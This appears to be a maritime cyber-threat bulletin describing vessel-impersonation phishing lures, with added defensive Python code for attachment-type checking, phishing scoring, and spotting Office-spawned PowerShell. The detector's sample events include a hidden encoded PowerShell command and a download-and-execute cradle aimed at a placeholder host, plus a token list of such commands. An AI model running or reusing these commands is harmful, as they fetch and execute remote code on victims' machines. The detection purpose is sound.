
Maritime Cyber Security & Threats March 2020 Week One

Vessel Impersonation Report

Dryad Global’s cyber security partners, Red Sky Alliance, perform weekly queries of backend databases, identifying all new data containing Motor Vessel (MV) or Motor Tanker (MT) in the subject line of malicious emails. Use of the Motor Vessel (MV) or Motor Tanker (MT) keywords in an email subject line is a common lure to entice users in the maritime industry to open emails containing malicious attachments.

With our cyber security partner, we are providing a weekly list of motor vessels observed being impersonated, together with the associated malicious emails.

The identified emails attempted to deliver malware or phishing links to compromise the vessels and/or their parent companies. Users should be aware of the subject lines used and of the sender addresses attempting to deliver these messages.

In the collection above, we see malicious actors using vessel names in an attempt to spoof companies in the maritime supply chain. This week a large percentage of these malicious emails attempted to deliver Windows trojan malware, specifically Wacatac. Vessel names seen include “MT ATHENIA” and “MV FASKOLD”, among others.

An email was observed attempting to impersonate “Twin Logistics” using a subject line of “The Integrated Container Logistics & Supply Chain Services.”  Twin Logistics is a freight and shipping company out of Cambodia.

Analysis reveals that the malicious email was sent from a legitimate domain, which usually indicates a compromised account or mail server rather than a look-alike domain. The malicious email appears to be targeting employees at Image Model, a model-making company based in Taiwan. It appears the targeted employee forwarded this malicious email to another employee. It is unclear whether the malware propagated itself by email or whether the message was forwarded manually.

The message contains an attached Excel spreadsheet identified by Microsoft as Trojan:Win32/Wacatac.C!ml.[1] The message body asks the victim to open the attached file to find the PI/BL (proforma invoice / bill of lading) for the vessel and the ETA of the cargo. However, opening the attachment titled “RQ_0868374pdf.gz” could activate the malware. Notice that the file name includes “pdf” to suggest a PDF document, but there is no .pdf extension: the real extension is .gz, and the file is a GZIP archive. Note also that the “!ml” suffix in the Microsoft detection name denotes a machine-learning (heuristic) verdict, so the family attribution to Wacatac is generic rather than a confirmed identification.
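
The file-name trick above (a document-type word buried in the name while the real extension points at an archive) is caught by reading an attachment's leading bytes instead of trusting its name. The checker below is an added example and not code from the Dryad Global or Red Sky Alliance report; the attachments it inspects are constructed in memory, and an OLE2 header stands in for the spreadsheet because the report does not publish the file contents.

```python
"""Check whether an attachment's real file type matches what its name
suggests, the trick used by "RQ_0868374pdf.gz". Added example, not code
from the Dryad Global / Red Sky Alliance report; the attachments below
are constructed in memory (the report does not publish the file bytes)."""
import gzip
import io
import re

# Leading bytes of the container types common in document lures.
MAGIC = [
    (b"\x1f\x8b", "gzip"),
    (b"%PDF-", "pdf"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole2"),  # legacy .doc / .xls
    (b"PK\x03\x04", "zip"),                          # .docx / .xlsx / .zip
    (b"MZ", "pe"),                                   # Windows executable
]

# Extensions a user would reasonably expect for each real type.
EXPECTED_EXT = {
    "gzip": {".gz", ".tgz"},
    "pdf": {".pdf"},
    "ole2": {".doc", ".xls", ".ppt", ".msg"},
    "zip": {".zip", ".docx", ".xlsx", ".pptx"},
    "pe": {".exe", ".dll", ".scr"},
}

# Document-type words planted in a file name to imply a harmless document.
TYPE_WORDS = re.compile(r"(pdf|docx?|xlsx?|jpe?g|png)", re.IGNORECASE)
DOUBLE_EXT = re.compile(r"\.[a-z0-9]{2,4}\.[a-z0-9]{2,4}$", re.IGNORECASE)


def sniff(data: bytes) -> str:
    """Identify the container type from its magic bytes, not its name."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return "unknown"


def extension(name: str) -> str:
    m = re.search(r"\.[^.]+$", name)
    return m.group(0).lower() if m else ""


def inspect_attachment(name: str, data: bytes) -> dict:
    """Return the real type, the type one level inside a gzip wrapper,
    and the deception findings derived from the name."""
    kind = sniff(data)
    ext = extension(name)
    expected = EXPECTED_EXT.get(kind, set())
    findings = []

    if kind != "unknown" and ext not in expected:
        findings.append(f"extension {ext or '(none)'} does not match content type {kind}")

    # "RQ_0868374pdf.gz": a document-type word in the stem that is not the real type.
    stem = name[: len(name) - len(ext)] if ext else name
    word = TYPE_WORDS.search(stem)
    if word and "." + word.group(0).lower() not in expected:
        findings.append(f"name suggests {word.group(0).lower()} but content is {kind}")

    if DOUBLE_EXT.search(name):
        findings.append("double extension")

    inner = None
    if kind == "gzip":
        # The payload inside the archive is what the victim would actually open.
        try:
            inner = sniff(gzip.GzipFile(fileobj=io.BytesIO(data)).read(8))
            findings.append(f"gzip wraps {inner}")
        except (OSError, EOFError):
            findings.append("gzip archive is corrupt or truncated")

    return {"name": name, "type": kind, "inner_type": inner, "findings": findings}


# Constructed samples: an OLE2 header stands in for the malicious spreadsheet.
OLE2_STUB = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 64
SAMPLES = [
    ("RQ_0868374pdf.gz", gzip.compress(OLE2_STUB)),        # the report's lure pattern
    ("Sider Buffalo ship's description.doc", OLE2_STUB),   # name and type agree
    ("proforma_invoice.pdf", b"%PDF-1.4\n%stub\n"),         # genuine PDF
    ("statement.pdf.exe", b"MZ" + b"\x00" * 62),            # double extension
]


def triage(samples=SAMPLES) -> list:
    return [inspect_attachment(name, data) for name, data in samples]


if __name__ == "__main__":
    for r in triage():
        print(r["name"], "->", r["type"], r["inner_type"], "|", "; ".join(r["findings"]))
```

Run at the mail gateway this needs only the first few bytes of each attachment; the sniff step deliberately ignores the declared MIME type and extension, since both are attacker-controlled.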

In another example, we see an email attempting to impersonate the vessel “M/V TBN” using the subject line “M/V TBN – URGENT PDA DUMAI”.  The subject line includes “URGENT” which is a common social engineering method to further entice victims to quickly open the email and activate the malware.

No legitimate vessel named “TBN” could be found on marinetraffic.com; in chartering, “TBN” is the standard abbreviation for “to be nominated”, a placeholder used before a specific vessel has been fixed, not a ship’s name. The subject line also includes Dumai, a known port in Indonesia. No vessel with a name resembling “TBN” has arrived at or departed from that port recently.

An attachment titled “Sider Buffalo ship’s description.doc” is identified by the Microsoft AV engine as Trojan:Win32/Sonbokli.A!cl. This malware uses the built-in Windows PowerShell tool to connect to command-and-control servers and download additional malware onto the victim’s device.[2]
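
The behaviour just described leaves a reliable trace in endpoint telemetry: an Office process spawning PowerShell with a download cradle on its command line. The detection logic below is an added example and not part of the Dryad Global report; the process-creation events it runs over are constructed here, shaped like Sysmon Event ID 1 fields, and the base64 blob in the first event simply encodes the word "Sample" in UTF-16LE.

```python
"""Detect an Office application spawning a script host with download-cradle
tokens on its command line, the behaviour of macro-based downloaders such as
the one described above. Added example, not from the Dryad Global report; the
events are constructed and shaped like Sysmon Event ID 1 (process creation)."""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "regsvr32.exe", "rundll32.exe"}

# Tokens characteristic of PowerShell download-and-execute command lines.
CRADLE_TOKENS = re.compile(
    r"(downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b|"
    r"net\.webclient|start-bitstransfer|\biex\b|invoke-expression|"
    r"frombase64string|-e(?:nc|ncodedcommand)?\b|-w(?:indowstyle)?\s+hidden|"
    r"executionpolicy\s+bypass|-nop\b|-noprofile\b)",
    re.IGNORECASE,
)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> dict:
    """Grade one process-creation event; 'reasons' explains the grade."""
    parent = _basename(ev.get("ParentImage", ""))
    child = _basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    tokens = sorted({m.group(0).lower() for m in CRADLE_TOKENS.finditer(cmd)})
    office_spawn = parent in OFFICE_APPS and child in SCRIPT_HOSTS

    reasons = []
    if office_spawn:
        reasons.append(f"{parent} spawned {child}")
    if tokens:
        reasons.append("download-cradle tokens: " + ", ".join(tokens))

    if office_spawn and tokens:
        severity = "high"      # document macro pulling a second stage
    elif office_spawn:
        severity = "medium"    # Office rarely launches a shell in normal use
    elif tokens:
        severity = "low"       # admins script downloads too; correlate first
    else:
        severity = "none"
    return {"pid": ev.get("ProcessId"), "severity": severity,
            "tokens": tokens, "reasons": reasons}


# Constructed events; the base64 encodes the word "Sample" in UTF-16LE.
SAMPLE_EVENTS = [
    {"ProcessId": 4412,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc UwBhAG0AcABsAGUA"},
    {"ProcessId": 4420,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Date"},
    {"ProcessId": 4431,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"ProcessId": 4440,
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/x')\""},
]


def triage(events=SAMPLE_EVENTS) -> list:
    return [score_event(e) for e in events]


if __name__ == "__main__":
    for r in triage():
        print(r["pid"], r["severity"], "|", "; ".join(r["reasons"]))
```

The parent-child relationship is the strong signal; the token list only ranks it, because an encoded or obfuscated cradle will not match any token and must still be caught by the Office-to-shell rule alone.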

The message body confirms that the sender is referencing Dumai Port. There are a lot of indicators that the sender is unlikely to be legitimate. The sender claims the request concerns a possible cargo of 5,000 metric tons, a very large load to bring into a port, which draws attention and is likely to cause the victim to open the attachment quickly.

[1] https://www.virustotal.com/gui/file/ddcac1e814ec478d4b9c268b169a0c3cbee701597f2a2ba68bef1292d5513580/detection

[2] https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.x97m.powload.usmanfogas

Typically, the use of language is a good indicator of a spoofed message. In this case, however, there are other indicators that the sender is illegitimate. They use a generic “Dear Agent” salutation, which is common in malicious emails. Also, the sender’s address uses a domain under Gabon’s country-code TLD (nugatera[.]ga), even though the sender’s name suggests a Hebrew origin (Nadav) and the phone number listed is an Israeli number (+972 8 6465126). The TLD itself says little about where the sender actually sits: .ga domains were available free of charge at the time and were widely abused for phishing; it is the mismatch between domain, name and phone number that is telling.

Errors in grammar and punctuation can indicate that a non-native speaker originated a message. This is especially indicative when the attacker is trying to impersonate a sender who would be expected to speak and write the language fluently. Overall, the use of language in this message is good, but on close inspection there are punctuation errors, capitalization errors, and slight phrasing issues throughout.
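
Several of the indicators in this report can be checked mechanically before a message reaches a reader: the MV/MT vessel-name lure that Red Sky Alliance queries for, the “URGENT” subject, the generic “Dear Agent” salutation, and a sender domain whose country-code TLD does not match the phone number in the signature. The scorer below is an added example, not code from the report or its authors; both messages it runs over are constructed (addresses, names and the phone number are invented), and the TLD-to-calling-code table covers only the countries needed here.

```python
"""Score an inbound message against the lure indicators described in this
report: a vessel-name subject (MV/MT/M/V/M/T), urgency language, a generic
"Dear Agent" salutation, and a sender domain whose country does not match
the phone number in the signature. Added example, not from the report; both
messages below are constructed (names, addresses and numbers are invented)."""
import re
from email import message_from_string, policy
from email.utils import parseaddr

# Prefix is case-insensitive; the vessel name is taken as one or two
# upper-case words so trailing subject text ("- URGENT PDA") is not swallowed.
VESSEL_LURE = re.compile(
    r"\b(?i:M[./]?[VT]|MOTOR\s+(?:VESSEL|TANKER))\b[\s:]*"
    r"([A-Z][A-Z0-9']*(?:\s+[A-Z][A-Z0-9']*)?)"
)
URGENCY = re.compile(r"\b(urgent(?:ly)?|immediately|asap|action required)\b", re.IGNORECASE)
GENERIC_SALUTATION = re.compile(
    r"^\s*dear\s+(agent|sir/madam|sir|customer|user|partner|colleague|team)\b",
    re.IGNORECASE | re.MULTILINE,
)
PHONE_CC = re.compile(r"\+\d{1,3}")
# Country-code TLD -> E.164 calling code; only the countries this example needs.
TLD_TO_CALLING_CODE = {"ga": "+241", "il": "+972", "kh": "+855", "tw": "+886", "id": "+62"}

WEIGHTS = {
    "vessel-name lure": 1,          # legitimate maritime mail uses MV/MT too
    "urgency language": 1,
    "generic salutation": 2,
    "sender TLD country differs from phone country": 2,
}
REVIEW_THRESHOLD = 3


def score_message(raw: str) -> dict:
    msg = message_from_string(raw, policy=policy.default)
    subject = str(msg["subject"] or "")
    part = msg.get_body(preferencelist=("plain",))
    body = part.get_content() if part is not None else ""
    findings = []

    lure = VESSEL_LURE.search(subject)
    vessel = lure.group(1).strip() if lure else None
    if vessel:
        findings.append("vessel-name lure")
    if URGENCY.search(subject) or URGENCY.search(body):
        findings.append("urgency language")
    if GENERIC_SALUTATION.search(body):
        findings.append("generic salutation")

    domain = parseaddr(str(msg["from"] or ""))[1].rsplit("@", 1)[-1].lower()
    tld = domain.rsplit(".", 1)[-1]
    phone = PHONE_CC.search(body)
    expected_cc = TLD_TO_CALLING_CODE.get(tld)
    if phone and expected_cc and phone.group(0) != expected_cc:
        findings.append("sender TLD country differs from phone country")

    score = sum(WEIGHTS[f] for f in findings)
    return {"from_domain": domain, "vessel": vessel, "findings": findings,
            "score": score, "verdict": "review" if score >= REVIEW_THRESHOLD else "pass"}


# Constructed messages modelled on the patterns in the report; not real samples.
PHISH = """\
From: Nadav <chartering@example-shipping.ga>
To: agent@example-port-agency.com
Subject: M/V TBN - URGENT PDA DUMAI
Content-Type: text/plain; charset="utf-8"

Dear Agent,

Kindly provide your PDA for Dumai for a possible cargo of 5,000 metric tons.
Ship's description is attached. Please revert urgently.

Best regards,
Nadav
Tel: +972 8 000 0000
"""

LEGIT = """\
From: Port Operations <ops@example-agency.com>
To: master@example-shipowner.com
Subject: Re: MT ATHENIA - port agency appointment
Content-Type: text/plain; charset="utf-8"

Dear Captain Smith,

Thank you for the nomination. Berthing prospects will follow once the
harbour master confirms the window.

Kind regards,
Port Operations
"""

SAMPLE_MESSAGES = [PHISH, LEGIT]


def triage(messages=SAMPLE_MESSAGES) -> list:
    return [score_message(m) for m in messages]


if __name__ == "__main__":
    for r in triage():
        print(r["from_domain"], r["vessel"], r["score"], r["verdict"], r["findings"])
```

The vessel-name lure is deliberately weighted low: MV/MT subjects are everyday traffic for agents and owners, and the value of the check is in the combination with a generic salutation, urgency and an inconsistent sender identity, not in any one signal.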

These analyses illustrate how a recipient could be fooled into opening an infected email. Doing so could make the recipient an infected node in the maritime supply chain, and from there spread additional malware to vessels, port facilities and shore companies in the marine, agricultural and other industries.

Pre-empt, don’t just defend

Preventative cyber protection offers a strong first line of defense by preventing deceptive messages from ever reaching staff inboxes, but malicious actors are developing new techniques to evade current detection daily. Using preemptive information from the Red Sky Alliance RedXray diagnostic tool, our Vessel Impersonation reports and Maritime Blacklists offer a proactive solution for stopping cyber-attacks. Recent studies suggest cyber-criminals are researching their targets and tailoring emails to staff in specific roles. Another tactic is to spoof emails from the chief executive or other high-ranking maritime contemporaries in the hope that staff lower down the supply chain will lower their guard and follow the spoofed email obediently. Analysts across the industry are beginning to see maritime-specific examples of these attacks.

The more convincing an email appears, the greater the chance that employees will fall for a scam. To address this residual risk, software-based protection should be treated as one constituent of a wider strategy that also encompasses the human element as well as organizational workflows and procedures.

It is imperative to:

  • Train all levels of the marine supply chain to realize they are under constant cyber-attack.
  • Stress maintaining constant attention to real-world cyber consequences of careless cyber practices or general inattentiveness.
  • Provide practical guidance on how to look for a potential phishing attempt.
  • Use direct communication to verify emails and supply chain email communication.
  • Use Red Sky Alliance RedXray proactive support, our Vessel Impersonation information and the Maritime Blacklists to proactively block cyber-attacks from identified malicious actors.

Source: Dryad Global